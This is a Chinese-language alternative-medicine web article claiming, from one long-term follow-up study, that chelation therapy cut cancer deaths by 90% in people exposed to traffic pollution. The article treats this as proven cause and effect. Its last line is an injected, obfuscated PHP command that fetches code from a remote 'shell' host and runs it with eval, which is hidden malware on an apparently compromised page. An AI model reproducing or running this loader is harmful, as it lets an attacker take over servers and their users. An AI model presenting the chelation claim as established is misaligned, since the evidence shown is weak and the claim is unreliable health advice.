收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 螯合療法改變罹癌死亡率
螯合療法改變罹癌死亡率 列印 E-mail
       美國Dr. Cranton所著的「Bypassing By Pass」一書中,曾提到美國做過這樣的實驗:
        Dr. W. Blumer and Dr. T. Reich 發現二百三十一個居住在交通頻繁高速公路旁的人當中,癌症的死亡率大大高出那些住在同樣城市、但車流量少的地方。因此作者假定:較高的癌症死亡率,是因為汽車的排放廢氣和公路上的灰塵所導致,因為它們含有鉛、鎘、和其他致癌物質。

這樣的推測,立刻獲得某些調查癌症成因者所支持!他們發現,城市癌症的發生率的確高於鄉村,即使居住在城市裡的人並不抽煙;也因此他們判斷,若長時間暴露於在小量的鉛之下,就會降低對癌症的抵抗力。

        Blumer和Reich長期追蹤後續「接受螯合療法」和「沒有接受螯合療法」治療兩組人的死亡率。五十九位住在交通繁忙地段的成人有接受「螯合療法」,一百七十二位沒有;經十八年的長期追蹤後,「接受螯合療法」治療的五十九個病人當中,只有一位死於癌症(比例是百分之一點七);而一百七十二位「沒有接受螯合療法」治療的病人,則有三十位死於癌症(比例是百分之十七),兩者比例相差十倍之多。調查人員比較這兩組人的差異,發現唯一的不同在於是否使用「螯合療法」,其他並沒有任何干擾因素可以解釋這麼大的差距。

        他們得出一個結論:在十八年之中,因重金屬罹癌的死亡率降低了百分之九十,唯一的原因,是使用了「螯合療法」來排除體內的重金屬;至於因為重金屬所造成其他原因的死亡-—包括心血管疾病-—在「接受螯合療法」的這一組中,死亡率更是大大的降低。
註1:半衰期--減少至一半的量所需要的時間。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));